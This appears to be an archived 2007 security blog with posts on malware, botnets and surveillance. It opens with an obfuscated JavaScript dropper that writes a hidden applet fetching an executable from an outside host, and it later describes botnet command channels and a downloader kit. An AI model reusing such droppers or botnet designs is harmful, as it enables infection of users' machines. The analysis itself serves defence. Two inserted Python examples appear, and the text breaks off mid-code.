Shots from the Malicious Wild West - Sample One

March 10, 2007
Come to daddy. At _http://www.ms-counter.com we have a URL spreading malware through redirectors and the usual JavaScript obfuscation:

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Fetching it returns the following script (the base64 blob is truncated here just as it is in the original post):

var keyStr = "ABCDEFGHIJKLMNO" + "PQRSTUVWXYZabcdefghijk" + "lmnopqrstuvwx" + "yz0123456789+/=";

// Ordinary base64 decoding: keyStr is the standard alphabet, split across
// several string concatenations.
function decode64(input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    // drop anything that is not a base64 character (newlines included)
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    do {
        // four 6-bit values in, up to three 8-bit characters out
        enc1 = keyStr.indexOf(input.charAt(i++));
        enc2 = keyStr.indexOf(input.charAt(i++));
        enc3 = keyStr.indexOf(input.charAt(i++));
        enc4 = keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        // index 64 is "=", i.e. padding: no further output characters
        if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
        if (enc4 != 64) { output = output + String.fromCharCode(chr3); }
    } while (i < input.length);
    return output;
}

// The decoded markup is written straight into the page.
document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q" +
    "YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD" +
    "0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b" +
    "nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml" +
    "wdCBsYW5ndWFnZT0nam" /* ETC. ETC. ETC. */));

Deobfuscating the JavaScript reveals a hidden 1x1 applet (archive ms-counter.jar, entry class BaaaaBaa.class) whose "url" parameter tells us where the binary is, followed by yet another script:

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it through VirusTotal gives the results you can see in the screenshot: the major AV engines do not detect this one. What you should keep in mind is the inherent weakness of the signature-based approach to malware detection, and that assumes the user even bothers to update their AV software. In another analysis I'll present a binary that all the major AV vendors detect but the second-tier ones miss. Host-based IPS, behaviour blocking and, above all, preventing the script from loading in the first place are the ways to avoid the gaps in signature-based scanning.

Envy These Women Please

March 09, 2007
Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or is inherited wealth boring right from the very beginning? The emergence of the spoon people, or so they say: "Spoon feeding in the long run teaches us nothing but the shape of the spoon" (Edward Morgan Forster). A week ago I took part in a discussion about power, mainly one trying to define it, and we ended up with several kinds of power: positional power, the C-level executives; expertise power, or the revenge of the underestimated walking case studies; and networking power. It's all a cyclical process, like pretty much anything in life.

U.K's Latest Military Satellite System

March 09, 2007
The U.K. military is about to upgrade its Skynet 4 satellite system to Skynet 5:

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning: its ability to focus bandwidth where it is needed, and the sort of DENY:ALL upgraded receive antenna that resists jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest; so vulnerable that it makes you want to establish a space warfare code of conduct.

Armed Land Robots

March 09, 2007
After seeking to dominate the air, defense contractors are turning back to innovating on the ground, especially with armed, remotely controlled robots. Crucial for both reconnaissance and guerrilla warfare situations, mobility and payload capacity are what add the most value to these robots. The Israel-based defense contractor Elbit Systems recently introduced the Viper:

"The Viper, which is about a foot long and weighs approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility of a 360-degree view, its noise level, the variety of terrain it supports, and most importantly whether it would put itself back on its "feet" if it inevitably ends up upside down. See, you wouldn't want your pricey attack toy acting like a cheap remote-controlled toy car, would you? Engadget has a photo of the Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case.

UK Telecoms Lack of Web Site Privacy

March 08, 2007
When the U.S. and Canada are the benchmark, it's logical that the U.K. gets poor ratings, as web site privacy, especially in the commercial sector, is something the U.S. and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter at a time when government officials abuse commercially aggregated data, data they cannot legally obtain themselves, and so have to act as paper tigers to access it? Here's an interesting analysis:

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K., realizing the ongoing negative PR across the globe over its CCTV surveillance myopia, has released a report claiming Italy's COMINT is worse than its (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question.

Steganography Applications Hash Set

March 08, 2007
Did you know that there are over 600 applications capable of using steganography to hide data? Me neither, but here's a company that's innovating in the field of detecting such communication:

"Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every file artifact associated with 625 steganography applications, SAFDB is the world’s largest commercially available hash set exclusive to digital steganography and other information hiding applications. The database is used by Federal, state and local law enforcement; intelligence community; and private sector computer forensic examiners to detect the presence or use of steganography and extract hidden information.

Version 3.0 contains hash values for each file artifact associated with the 625 steganography applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512 algorithms.

A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, government, and intelligence agency computer forensic examiners."

Chart courtesy of Huaiqing Wang and Shuozhong Wang. And here's a related post.

Distributed Computing with Malware

March 08, 2007
Distributed computing with malware-infected PCs is nothing new as a concept; what has been missing is botnet masters' desire to contribute processing power to anything socially oriented. That changed late last month, when members of Berkeley's BOINC project noticed a participant who was suspiciously climbing the statistics and found out that malware-infected PCs had the BOINC client installed to crunch on his behalf:

"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who occupied a very high position in the boinc and project stats had reached this exalted position by dishonest means. In early June 2006 he appears to have released onto the internet a link purporting to provide Windows updates including now for Vista. Some 1500 members of the public worldwide downloaded these 'updates' which in fact consisted of a trojan application that downloaded boinc.exe and attached the person's computer to Wate's account, giving him the subsequent fraudulent credits. About 90% of the people affected appear to have uninstalled or disabled the unwanted boinc installation, but some compromised computers are still running and crashing climate models. Boinc and project staff have no means of contacting the owners of these computers."

If only botnet masters took this seriously, I'm sure we'd see certain networks controlling the top 10 positions at the BOINC project. A war on bandwidth or on CPU power?

Documentary on ECHELON - The Spy System

March 07, 2007
Remember ECHELON? The über-secretive worldwide intelligence sharing network that various activists once tried to poison by generating fake suspicious traffic with predefined keywords? Well, the system is still operating, and given the lack of transparency in the participating countries' use and abuse of the technology, all we need now is an EU alternative competing with the original.

Watch this excellent half-hour-long documentary and find out: "What exactly is Echelon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of NSA's electronic espionage."

USB Surveillance Sticks

March 07, 2007
Despite the growing awareness among enterprises and end users of the risks posed by removable media, there are vendors offering various surveillance solutions on a USB stick. Some are handy, others contradictory. And while RFID tags are getting smaller than a grain of rice, here are three surveillance solutions to keep in mind, right next to the notorious KeyGhost hardware keylogger.

SnoopStick
An example of malware on demand at $59.95 which comes with lots of features as well as automatic updates :

"The SnoopStick monitoring components are completely hidden, and there are no telltale signs that the computer is being monitored. You can then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time you want to see what web sites your kids or employees are visiting, who they are chatting with, and what they are chatting about, simply plug in your SnoopStick to any Windows based computer with an Internet connection and a USB port. SnoopStick will automatically connect to the target computer."

TrackStick
Portable GPS surveillance with historical routes that look simply amazing when applied at Google Earth :

"The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping technologies, your exact location can be shown on graphical maps and 3D satellite images. The Track Stick's micro computer contains special mathematical algorithms, that can calculate how long you have been indoors. While visiting family, friends or even shopping, the Track Stick can accurately time and map each and every place you have been."

GadgetTrack
An interoperable surveillance solution meant to help if your iPod or even PSP gets stolen: all you have to do is infect your own device and pray there's Internet connectivity at a later stage. Tracking your stolen devices is one thing; getting them back is another entirely:

"What if your device could phone home? Well now it can. With our patent-pending GadgetTrak™ system, you simply register your device and install our agent files on your device. If your device is missing or stolen, you log into your account and flag the device as lost or stolen. The next time the device is accessed it will attempt to contact us and provide data regarding the system it is plugged into."

Death is Just an Upgrade

March 07, 2007
Started as a project to digitally mimic human behaviour 100%, the Virtual Soldier Research program is getting more funding to accomplish its mission, and to go beyond it:

"In particular, the contract calls for the VSR team to further develop their "Predictive Dynamics" tools for use in calculating human motion in a military environment. Invented by VSR researchers, the field of Predictive Dynamics already has made a significant impact on the field of human motion simulation by making it possible -- for the first time ever -- to calculate the walking and running involved in human gait when given such variables as human body size, strength, weight, load-carrying abilities and clothing effects."

Next, Santos will find himself exposed to radiation, blown to pieces, hit by a truck, or pretty much anything that you would never get the chance to expose a living human to, legally, for testing purposes.

Botnet Communication Platforms

March 07, 2007
Botnets, the automated exploitation and management of malware-infected PCs, are perhaps the most popular and efficient cyber threat the Internet faces these days. Whether you frame it as the war on bandwidth or as who commands the largest infected population, this simple distributed host management problem keeps evolving so that botnet masters remain undetected for as long as possible. On the other hand, the growing Internet population, combined with the lack of awareness of the "just got a PC for Christmas" users and IPv4's well-known susceptibility to IP spoofing compared to IPv6, always makes the concept an interesting one to follow.

At the beginning of 2006 I pointed out how malware documentation and howtos turned into open source code, resulting in a flood of malware variants and lowering the entry barrier for novice malware copycats. A week ago I located a very thorough document on various botnet communication platforms, and I'm sure its author wouldn't mind me reposting the fancy graphs and commenting on them.

IRC based Botnet Communications
Nothing ground-breaking in this one, besides the various advice on stripping down the IRCd, running your own network of IRC servers instead of using public ones, and the importance of distributed secrecy of the botnet participants' IPs: each bot never knows the exact number or location of all servers and bots.

HTTP Botnet Communications

The possibilities with PHP and MySQL in respect of flexible statistics, layered encryption and tunneling, and most importantly decentralizing command and even improving authentication with port knocking are countless. Besides, with all the buzz about botnets continuing to use IRC, it's a rather logical move for botnet masters to shift to other platforms, where communicating amid HTTP's noise improves their chance of remaining undetected. Rather ironically, the author warns of possible SQL injection vulnerabilities in the botnet's command panel.

ICQ Botnet Communications
Perhaps the main reason to repost these graphs was the ICQ communication platform, which I'll leave up to you to figure out. The reliance on icq.com is listed as a major weakness, but just as we've already seen botnets obtain their commands by visiting an IRC channel and parsing its topic, in this case it's ICQ whitelists that get the attention.

Related comments on the programming "know-how" discussed will follow. Know your enemy!

Real Time Censored URL Check in China

March 02, 2007
While the original initiative for a real-time URL censorship check in China was realized as a project by Jonathan Zittrain and Benjamin Edelman a couple of years ago, it's great to see someone continue what they started and come up with GreatFirewallofChina.org:

"Aim of this website is to be a watchdog and keep track of which and how many or how many times sites are censored. Help to keep the censorship transparent. Each blocked website will automatically be added to the great firewall on the homepage."

What you should keep in mind is that, despite the capability for URL checking, from a technical perspective the censorship in China is much more sophisticated. Given that URLs can be obfuscated and that proxies and many other alternatives such as Tor can be used, what I have in mind is dynamic scanning of page content for subversive keywords, the same technique used for SMS messages. For instance, according to GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn't mean a Taiwan-independence-related blog's content wouldn't get filtered. Moreover, it's perhaps even more disturbing to see various search results from a Chinese user's perspective than merely to figure out whether a URL is blocked or not. Here are two great screenshots confirming the twisted reality, and a recent summary of the situation in China.

It would be great to see how this project evolves and starts presenting its results by confirming whether or not a URL is blocked in every country on the world's censorship map, or even better, starts feeding local search engines with possibly censored keywords, summarizing the results and emphasizing the big picture.

AdSense Click Fraud Rates

March 01, 2007
Google's single most profitable revenue source, AdSense, has always been under fire for click fraud, and most importantly the company has been under public scrutiny to communicate its efforts on fighting the problem better. Third-party companies emerged to fill the niche with click fraud analytics software, so that Google's major customers, and even small to mid-size businesses, could take advantage of an automated way to analyze click anomalies. But how prevalent is the problem really? Should the discussion always orbit around Google's efforts and its customers' vigilance and education on detecting click fraud, or should it shift to improving the communication between all participants, namely Google, its customers and the click auditing companies?

According to the most recent click fraud rate from Google, the click fraud that slips past its filters amounts to less than 0.02 percent of all clicks. Danny Sullivan has an in-depth analysis of the topic, emphasizing the importance of detected click fraud rates:

"Finally, we have a click fraud rate from Google itself: less than 0.02 percent of all clicks slip past its filters and are caught after advertisers request reviews. That low figure is sure to bring out the critics who will disagree. Below, more about how Google comes up with the figure plus some click fraud fighting initiatives it plans to implement later this year. Why release this figure now, when many have wanted it for literally years?

"We've been working to be more transparent and informative on the issues related to click fraud. Recently, this metric has been something advertisers have specifically asked for and we agree that is useful in describing the scope of the problem. Further, it is something we measure and use to monitor the performance of our click fraud detection systems," said Shuman Ghosemajumder, business product manager for trust & safety at Google."

In July 2006 Google commissioned a third-party analysis of its efforts to fight click fraud that you will definitely find informative, and here's another piece of research taking the discussion beyond the typical botnets-and-human-clickers perspective. There are also click fraud false positives to keep in mind, as shown in this analysis.

Stats courtesy of Clickfraudindex, who by the way started blogging recently.

Social Engineering the Old Media

February 28, 2007
While the rule of thirds is partly in place, the floating fragrance bottle and his depressed look provide some clues. The story is very interesting though, as it has happened before. As Tim Nudd comments on Adfreak:

"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have them bill Gucci directly for the $50,000. They’ll fall for it every time."

How could it have been prevented? By coordinating the campaign with local Gucci representatives, by ensuring payment is processed before the ad is featured, or, let's just say, by looking at his face to figure out he's anything but a professional model.

Storm Worm Switching Propagation Vectors

February 28, 2007
The storm started with mass mailings, then the malware switched to IM propagation, and now the infected PCs are further spreading through blog and forum posts :

"But the twist comes when these people later post blogs or bulletin board notices. The software will insert into each of their postings a link to a malicious Web site, said Alperovitch, who rates the threat as "high." "We haven't seen the Web channel used before," he said. "In the past, we've seen malicious links distributed to people in a user's address book and made to look like it's an instant message coming from them."

The smart thing is that, compared to situations where malware authors have to figure out how to bypass the forum's CAPTCHA or mass-spam and generate new blogs, in this case the (infected) end user is authenticating both himself and the malware. Here are some malware stats on social networking sites worth going through as well.

UPDATE: Symantec has a nice analysis with some screenshots of this variant.

Credit Card Data Cloning Tactic

February 27, 2007
First of all, she's too cute for anyone to have even the slightest suspicion, and to be honest the posers paying for their coffee with a credit card deserve it; it leaves them without the opportunity to leave change, or at least that's what they thought.

XSS Vulnerabilities in E-banking Sites

February 27, 2007
The other day I came across this summary with direct examples of various XSS vulnerabilities on e-banking sites, and I wonder why the results still haven't gotten the necessary attention from the affected parties:

"First of all you should realize, that this is not the first time, that we are doing such a website. The last time we hit a vast number of sites, mostly German banks. We have shown, that those sites, that should be most secure are not! Many visitors saw the site and also the banks seemed quite upset, nevertheless they fixed the problems, that we pointed at. You can check out the archive at: [English version] and [German version]. This project has been done as a direct reaction to the poll done in Austria not long ago and which was reported at [this article] from Heise. For the English readers of you, this article basically says, that 9 of 10 people using online banking in Austria trust the security, that their banks offer."

The best phishing attack, at least from a technical perspective, is the one that uses a vulnerability in the targeted brand's own site to make itself more believable, and believe it or not, certain phishing attacks actually load images directly from the impersonated site instead of producing the phishing creative on their own.

Fake Terror SMS Sent to 10,000 People

February 27, 2007
This is serious, and while it was a hoax, it could have had far more devastating results acting as a propagation vector for malware or as a phishing attack, since the social engineering potential here, for anything offline or online, is huge:

"About 10,000 commuters who subscribe to the train operator's timetable messaging service received the threatening text message on Friday night after hackers broke into the system. The message, sent after 9.30pm (AEDT), reads: ALLAHU AKBR FROM CONNEX! our inspectorS Love Killing people - if you see one coming, run. Want to bomb a train? they will gladly help. See you in hell!"

ALLAHU AKBR means "God is the Greatest". Which God is the greatest I'll leave up to your religious beliefs, though the Muslim motives are spooky, and the attack directly undermines citizens' confidence in their government's ability to protect them; what I anticipate next are articles on how terrorists take control of trains. I'm very interested in who has access to the company's feature, and most importantly to what extent they are outsourcing it, or was it an insider who used someone else's terminal to send the message? Here's a related post on the interest of various governments in developing SMS disaster alert and warning systems and the related security and impersonation problems to consider.

A Review of SiteAdvisor Pro

February 23, 2007
During 2006 the company popped up like a mushroom in front of my desktop, as you can read in a previous post and in one on its acquisition two months later. In the typical detailed and extensive CNET Reviews style, here's what they have to say about SiteAdvisor Plus:

"SiteAdvisor Plus includes the ability to report suspicious links within IM and e-mail and can automatically block access to flagged sites. However, SiteAdvisor Plus lacks additional configuration options and doesn't work with Firefox or Opera, or with branded browsers from AOL and other services. In addition, the paid version on Internet Explorer appears to conflict with the free version installed on Firefox. Overall, we experienced greater flexibility and fewer hassles when using the free Netcraft toolbar, and we also liked the proactive nature of Linkscanner Pro better."

The niche-filling competition is also reviewed, namely LinkScanner Pro. Niche-filling in respect of real-time sandboxing of results, a concept I'm sure is on its way to SiteAdvisor, or else the community has a lot to contribute as always. SiteAdvisor is however truly embracing a Web 2.0 business model on all fronts, and it's perhaps my favorite case study on commercializing an academic idea during the last year.

Characteristics of Islamist Websites

February 23, 2007
Excellent and recent analysis of the most common characteristics of islamist websites published by the Middle East Media Research Institute :

"The media platform favored by the Islamist organizations is the Internet, which they prefer for several reasons: firstly, for the anonymity it allows - anyone can enter and post to a site without divulging personal information; secondly, due to the medium's availability and low cost - all that is required is a PC and an Internet connection; and thirdly, due to the ability to distribute material to a great number of people over a wide geographic area in a matter of seconds.

The organizations use the Internet mainly for propaganda and indoctrination, but also for operational military needs.

This paper will discuss the distinguishing characteristics of the websites of Islamist organizations and their supporters; the various online activities through which terrorist organizations assist the mujahideen on the ground, both militarily and, especially, with propaganda; and the Internet polemics that these organizations conduct vis-à-vis their enemies."

The majority of articles you've probably read do nothing more than scratch the surface of the topic. Fundraising, propaganda, communications within steganographic images and the use of plain simple encryption, or the thriller-type scenarios where entire food supply chains get remotely controlled or where your next dose of Prozac may be a little more dangerous than it actually is, of course because terrorists may have the capacity to do so. In the post-9/11 world terrorism experts started emerging from all over the globe, universities realized the potential and opened up courses, even degrees, security companies started pitching their offers with cyberterrorism in mind, and last but not least the mainstream media doesn't seem to stop piggybacking on historical events while actually doing terrorists the biggest marketing favour of them all: the media echo effect. Someone blows him or herself up in the Western world, and everyone forgets about all those little things people die from, if you were to go through your local statistical institute's death rates, and starts requesting more information on what the government is doing to prevent this from happening. Compare that with the same situation in the Middle East: it's part of daily life, nothing ground-breaking besides a bunch of lowlifes radicalizing online, looking for brainwashing mentors, and most importantly looking for a mighty excuse for their pathetic existence. A terrorist organization uploads a video of a soldier being shot, or anything that will shock someone who's still shocked by The Texas Chainsaw Massacre (boring; try the Evil Dead series), and people become so outraged and feel so helpless in the situation that fear, rather than reality, drives the entire model of terrorism.

Terrorism is successful both as a government's doctrine for re-election and as a term, mainly because it's a very open-ended term these days. In some countries glorifying terrorism is illegal, but if you let your government convince you that it isn't terrorizing you in order to protect you from an event that, statistically, doesn't happen very often, I think I will lose you as a reader of this blog. The world is losing the war on terrorism because it's rational and terrorists aren't. In the very same fashion that companies don't compete with companies but with networks, a network that's anything but rational isn't going to be beaten by a network that's too bureaucratic and still waging departmental wars.

Go through many of my previous posts on cyberterrorism, a relevant collection of cases, and through the research, which as a matter of fact is full of practical examples from various sites.

The RootLauncher Kit

February 23, 2007
After providing more insights on the WebAttacker Toolkit and the Nuclear Grabber, in this post I'll discuss RootLauncher, a release courtesy of the same group behind WebAttacker. Something else worth mentioning is that a large percentage of the sites I'm monitoring are starting to use authentication, with login access granted on a trust basis, perhaps due to the enormous coverage recent "underground" releases, namely phishing kits etc., got in the mainstream media. Therefore I'm doing my best to get as much information -- and screenshots -- as I can before it disappears, and I will blog on these releases as soon as my schedule allows me to. For instance, several months ago you could easily see over 50 publicly available control panels for the WebAttacker toolkit; now there are only a few available through Google. The same goes for RootLauncher.

The RootLauncher kit is advertised -- Russian to English automatic translation -- as follows :

"Just, we can offer you 3-version - D o w n l o a d e r-designed RootLauncher for the hidden load arbitrary WIN32 Exe-faila from a remote resource, followed by the launch of the file on the local hard disk. Obhodit all protection is not determined by any AV-Do not see fairvollah - Flexible settings - Periodic updates and supplements may download up to five exe files. Our team is not at the same point and develops all bolshe-bolshe for you dear friends services available to them closer you will be able to on our official website. We are also looking for people interested in partnership with us."

And while it's supposed to be nothing more than an average downloader, these "average downloaders" are actually starting to standardize features in respect to statistics and compatibility with other toolkits and malicious software.

In a previous post on Websense's blog, they came across a web panel showing that the "total number of unique launchers is 155" -- count these as infected PCs -- but as you can see in the image attached, the sample could be much larger. This one I obtained from the following URL : http://www.inthost7.com/cgi-bin/rleadmin.cgi which is of course down now, but was already listing 1013 launchers; here's an analysis of this very same URL.

IP cloaking when browsing such sites and forums is important in order for you to remain as anonymous as possible. If you're on a Russian site make sure you're coming from a Russian domain, if you're on a Chinese site make sure you're coming from a Chinese domain, and most importantly don't translate the page directly through Google or Altavista, but copy and paste what's interesting to you, so that nobody wonders why a Russian domain would be translating Russian text into English. Imagine the situation where security vendors browse them through their securityvendor.com subdomains; the results will follow shortly -- everything disappears.

In respect to WebAttacker, the kit is still widely used, but the people using and updating it are starting to prevent Google from crawling and caching the control panels, which makes it harder to keep track of the sites in an OSINT manner -- my modest honeyfarm keeps me informed on URLs of notice though. Here's one of the very few instances of a Web-Attacker control panel still available at Google. Here's an analysis of the source code of the Web-Attacker kit as well -- and I thought I was going full disclosure. More details on various newly released packers, multi-exploit infection toolkits, and standardized statistics, with all the screenshots I've managed to obtain, will follow next week.

Taking into consideration the big picture -- like you should -- the release and automation of phishing/exploit kits is lowering the entry barrier for script kiddies, who generate enough noise to keep the real puppet masters safe, or at least let them secretly pull the strings. I'd rather we operated in a time when launching a phishing attack required much more resources than it requires today.

Image Blocking in Email Clients and Web Services

February 22, 2007
Handy graphs and best practices on the state of default remote image loading in desktop and online email clients -- a problematic issue from a security point of view, and marketing heaven from an advertising perspective :

"Every client has its own default settings regarding displaying/hiding images. And while most email clients have a setting to turn images on or off, some offer conditional settings which are contingent upon known senders or other factors. The following table outlines the default settings of popular desktop- and webmail-clients."

Sometimes a spam email isn't sent with the idea of tricking someone into believing something, but to act as a verification that the email address exists, in the form of remote image -- web bug -- loading; and yes, the image request could also act as a redirector to pretty much anything malicious. Go through the related posts in case you're interested, and also see a common trade-off image spammers face.
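
How the web-bug check works in practice, as an added example that is not taken from the original post or the linked article: a heuristic scan of an HTML email body that flags remote images shaped like beacons, and the default-deny rewrite a mail client applies when it blocks remote images. The sample message, its domains and the tracking tokens are constructed, and the heuristics (1x1 or hidden images, a recipient token in the URL) are assumptions made for the illustration.

```python
"""Heuristic web-bug (tracking pixel) detection for HTML email bodies.

Added example; this is not code from the original post. The message body,
domains and tracking tokens below are constructed for illustration only.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample body: one inline logo, one 1x1 beacon carrying a recipient
# token, one ordinary remote banner, and one hidden image with a token in its path.
SAMPLE_HTML = """
<html><body>
<p>Dear customer, your account needs verification.</p>
<img src="cid:logo01" width="120" height="40">
<img src="https://tracker.example/open.gif?uid=7f3a9c12b8-44" width="1" height="1">
<img src="https://cdn.example/banner.jpg" width="468" height="60" alt="Offer">
<img src="http://bug.example/p/9b2e4d7a11c3f05e" style="display: none">
</body></html>
"""


class _ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.images.append({k.lower(): (v or "") for k, v in attrs})


def _is_invisible(attrs):
    """1x1 (or smaller) images and CSS-hidden images are the classic web bug shape."""
    try:
        width = int(attrs.get("width") or 0)
        height = int(attrs.get("height") or 0)
    except ValueError:
        width = height = 0
    tiny = "width" in attrs and "height" in attrs and width <= 1 and height <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = "display:none" in style or "visibility:hidden" in style
    return tiny or hidden


def _carries_token(url):
    """A query string, or an opaque digit-bearing path segment, usually identifies the recipient."""
    parsed = urlparse(url)
    if parse_qs(parsed.query):
        return True
    segment = parsed.path.rsplit("/", 1)[-1].split(".", 1)[0]
    return len(segment) >= 12 and any(c.isdigit() for c in segment)


def find_web_bugs(html):
    """Return the remote images that look like beacons, each with the reasons it was flagged."""
    collector = _ImgCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.images:
        src = attrs.get("src", "")
        if urlparse(src).scheme not in ("http", "https"):
            continue  # cid: and data: images never reach a remote server
        reasons = []
        if _is_invisible(attrs):
            reasons.append("invisible or 1x1 image")
        if _carries_token(src):
            reasons.append("unique token in URL")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


_REMOTE_SRC = re.compile(r'(<img\b[^>]*?\bsrc=)(["\'])https?://[^"\']*\2', re.IGNORECASE)


def block_remote_images(html):
    """Default-deny rewrite, as a mail client that blocks remote images does: every
    http(s) image source is replaced so nothing is fetched; inline cid: images stay."""
    return _REMOTE_SRC.sub(r"\1\g<2>about:blank\g<2>", html)


if __name__ == "__main__":
    for hit in find_web_bugs(SAMPLE_HTML):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

The detector is only a triage aid: a beacon can also be a full-size image served from a per-recipient URL, which is why the clients in the table that block all remote images by default are the safe ones, and the rewrite above is the behaviour they implement.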

Korean Zombies Behind the Root Servers Attack

February 22, 2007
More details on the recent DDoS attacks on the DNS root servers emerge; it seems the attacks originated from South Korean infected PCs, but were orchestrated from a host server in Coburg, Germany :

"Citing data from the North American Network Operators' Group, the Korean government confirmed 61 percent of the problematic data was traced to South Korea. Yet, the Ministry of Information and Communication flatly rebuffs the suspicion that Korea was the main culprit behind the cyber attacks. ``We learned a host server in Coburg, Germany ordered a flurry of Korean computers to stage DOS assaults on the root servers,'' said Lee Doo-won, a director at the ministry. ``In other words, Korean computers affected by viruses made raids into the root servers as instructed by the German host server. Many of our computers acted like zombies,'' Lee said."

On a spoofable IPv4 Internet, a packet's claimed origin is the most commonly exploited weakness on the front lines: nothing authenticates the source address. The article points out that 61% of the problematic data came from South Korea, and it would be logical to conclude the other 39% came from Chinese and U.S. based infected PCs, and while we can argue which country has the largest proportion of insecure end users -- or insecure end users with access to huge bandwidth -- that shouldn't be the point. The point is that ISPs should start considering how to stop malicious traffic going out of their networks, forged source addresses included, compared to their current mindset of outside-to-inside network protection.
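
The egress filtering just argued for, as an added example that is not part of the original post: source-address validation (what BCP 38 asks ISPs to do at their edge) run over constructed flow records leaving an imaginary ISP. The customer prefixes, the abbreviated bogon list and the flow data are assumptions made up for the illustration; the function names are mine.

```python
"""Source-address validation (egress anti-spoofing) over flow records.

Added example; this is not code from the original post. The ISP prefixes and
flow records below are constructed for illustration and describe no real network.
"""
import ipaddress

# Prefixes the (imaginary) ISP actually allocates to its customers. A packet
# leaving the network with a source outside them cannot be answered back to a
# customer and should be dropped at the edge rather than handed to transit.
ALLOCATED = [ipaddress.ip_network(p) for p in ("198.51.100.0/24", "203.0.113.0/24")]

# Address space that must never appear as a source on the public Internet
# (abbreviated list; a production filter would carry the full bogon set).
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]

# Constructed outbound flow records: (source, destination, destination port, packets).
SAMPLE_FLOWS = [
    ("198.51.100.23", "192.0.2.10", 53, 4),        # an ordinary customer DNS query
    ("10.0.0.5", "192.0.2.10", 53, 5000),          # RFC 1918 source leaking out
    ("8.8.4.4", "192.0.2.10", 53, 120000),         # forged source: a flood blamed on someone else
    ("203.0.113.77", "192.0.2.10", 53, 90000),     # real customer, still a flood (infected PC)
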